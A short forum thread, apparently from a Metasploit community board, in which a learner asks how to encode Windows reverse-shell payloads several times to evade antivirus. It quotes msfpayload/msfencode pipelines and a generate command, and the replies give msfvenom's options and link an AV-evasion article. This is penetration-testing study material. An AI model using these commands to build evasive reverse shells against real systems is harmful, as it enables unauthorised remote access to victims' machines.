3 Replies Latest reply on Feb 17, 2012 12:26 PM by zeknox

    generating payload

      Hi guys,

      I am new to metasploit and i am trying to learn this amazing tool. i am reading a book on it and im at a part where it talks about encoding the payloads to avoid Antivirus softwares. I am kinda confused if i HAVE to use msfcli to perform multiple encodings or if i can just use msfconsole. i prefer using msfconsole right now because i can press tab to get suggestions when typing paths and stuff. this is what im doing to encode the payload:


      msf> use payload/windows/shell/reverse_tcp

      msf > set LHOST .... and set LPORT ...

      msf>generate -f payload.exe -t exe -e x86/shikata_ga_nai


      Book uses the following code for multi encoding:

      root@bt:/opt/framework3/msf3# msfpayload windows/meterpreter/reverse_tcp LHOST= LPORT=31337 R | msfencode -e x86/shikata_ga_nai -c 5

      -t raw | msfencode -e x86/alpha_upper -c 2 -t raw | msfencode -e x86/shikata_ga_nai -c 5 -t raw | msfencode -e x86/countdown -c 5 -t exe -o /var/www/payload3.exe


      book uses version 3.7 of metasploit and im using version 4.2.



      1. is generate command in msfconsole equivalent to msfpayload/msfencode in msfcli?

      2. how do i write the code used by the book for multiple encodings (shown above) using the generate command in msfconsole? i could only figure out using the -e switch with the generate command in msfconsole which is good for only 1 encoding. how can i use multiple encodings?

      3. where do i find the path used by the use command (bolded above) payload/windows/shell/reverse_tcp? I checked my local directory structure and i only see /opt/framework/msf3/modules/payloads/stagers/windows/reverse_tcp.rb. I am not sure how the reverse_tcp is being loaded even though the paths to reverse_tcp is completely different


      any help would be greatly appreciated.


      thanks in advance.

        • Re: generating payload

          You can't use msfpayload and msfencode in msfconsole. You have the following options:


          1. Use mfscli in combination with msfpayload and msfencode like you alraedy did and published in the book.


          2. Use msfvenom


          Usage: /opt/framework/msf3/msfvenom [options] <var=val>




              -p, --payload    [payload]       Payload to use. Specify a '-' or stdin to use custom payloads

              -l, --list       [module_type]   List a module type example: payloads, encoders, nops, all

              -n, --nopsled    [length]        Prepend a nopsled of [length] size on to the payload

              -f, --format     [format]        Format to output results in: raw, ruby, rb, perl, pl, bash, sh, c, js_be, js_le, java, dll, exe, exe-small, elf, macho, vba, vbs, loop-vbs, asp, war

              -e, --encoder    [encoder]       The encoder to use

              -a, --arch       [architecture]  The architecture to use

                  --platform   [platform]

                                               The platform of the payload

              -s, --space      [length]        The maximum size of the resulting payload

              -b, --bad-chars  [list]          The list of characters to avoid example: '\x00\xff'

              -i, --iterations [count]         The number of times to encode the payload

              -c, --add-code   [path]          Specify an additional win32 shellcode file to include

              -x, --template   [path]          Specify a custom executable file to use as a template

              -k, --keep                       Preserve the template behavior and inject the payload as a new thread

              -h, --help                       Show this message

          • Re: generating payload

            I wanted to post an article that I feel is relevant to evading Antivirus with metasploit payloads.  This method offers alot of flexibility to the penetration testers to obfuscate the ASM instructions however they chose.  For more information see this blog article here:


            http://www.pentestgeek.com/2012/01/25/using-metasm-to-avoid-antivirus-detection- ghost-writing-asm/


            Let me know your thoughts!